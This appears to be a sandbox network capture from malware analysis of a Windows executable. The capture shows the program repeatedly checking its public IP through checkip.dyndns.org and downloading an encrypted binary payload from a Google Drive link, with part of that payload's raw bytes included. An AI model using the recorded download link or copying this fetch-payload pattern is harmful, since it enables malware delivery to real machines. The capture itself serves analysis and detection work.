Jan 10, 2025 22:32:29.165435076 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.3	50039	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:30.113130093 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:30.789267063 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.3	50041	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:31.751950979 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:32.456656933 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.3	50043	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:33.377614021 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:34.070358038 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.3	50045	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:34.961698055 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:35.641462088 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.3	50047	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:36.645812035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:37.318486929 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.3	50049	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:38.407104015 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:39.079986095 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.3	50051	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:40.018714905 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:40.723712921 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.3	50053	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:41.700366020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:42.399460077 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.3	50055	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:43.432569027 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:44.133246899 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.3	50057	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:45.185302973 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:45.869453907 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.3	50059	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:46.920924902 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:47.600188017 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.3	50061	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:48.568164110 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:49.254148006 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.3	50063	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:50.375056028 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:51.058772087 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.3	50065	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:52.076622963 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:52.767127991 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.3	50067	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:53.650755882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:54.341869116 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.3	50069	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:55.419482946 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:56.110635042 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.3	50071	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:57.089241028 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:57.772167921 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49957	172.217.16.206	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:28 UTC	216	OUT	GET /uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 21:31:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 21:31:28 GMT Location: https://drive.usercontent.google.com/download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-hTcF9SwfOrwPq2LydgSNeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49963	172.217.16.129	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:29 UTC	258	OUT	GET /download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 21:31:32 UTC	4933	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgTGORc0elWXKawzseyMC3lJRrJ0vrfWbJx57mILCzItJiA4EU04iYGQZkvZyN31QI1n Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="OcNNsWBsZVg92.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 94272 Last-Modified: Tue, 10 Dec 2024 07:01:29 GMT Date: Fri, 10 Jan 2025 21:31:32 GMT Expires: Fri, 10 Jan 2025 21:31:32 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ZH8YRg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 21:31:32 UTC	4933	IN	Data Raw: a9 6e f3 92 ec 42 7d d6 7c bd 3b 68 61 e9 36 6e f0 ea 39 85 b2 4b 07 a3 8e 80 6a 96 d9 22 fb fe 32 6a ad a3 9f 83 ba fe 02 23 2e 8c f4 42 7a 3b 43 42 0e 0a c1 77 17 94 a3 47 b0 55 4c 02 f2 5c 39 4e 7d 2f 0f b5 64 84 02 4e d7 2c 1f c3 c4 42 02 05 1a ab fc f0 ae 2b 6b d9 1f 9a 5f 83 d6 8a 14 f7 b3 a9 fb 14 79 db ba 2b 8d da 2e 4b 43 4b a2 7d 88 83 76 23 37 41 9a 2b b6 0b cc 33 30 84 26 8e 63 3b 08 bb 76 4f d0 5a d7 c4 f8 d4 0f 0d 51 3f b3 1b 08 bd 0e 48 91 8a 0d 1f 7a ed 29 e2 c4 5e 44 5c de 8e cb b9 78 37 e8 0a 19 24 68 8c 05 c7 4d 06 8d 53 38 f3 c7 13 15 ef 40 3c a3 49 12 22 c0 8f 74 a8 a9 c5 3a f9 a1 b4 32 3a 5d 77 cb 40 a5 1a 11 e0 9a a0 03 e0 50 65 8f a6 fa ef 77 2d 5a fb b1 37 f3 d0 ba f0 e9 b8 3d 5a 14 a9 a5 9e 3e cc 3e 50 68 25 0d a1 82 91 0f a7 f6 Data Ascii: nB}\|;ha6n9Kj"2j#.Bz;CBwGUL\9N}/dN,B+k_y+.KCK}v#7A+30&c;vOZQ?Hz)^D\x7$hMS8@<I"t:2:]w@Pew-Z7=Z>>Ph%
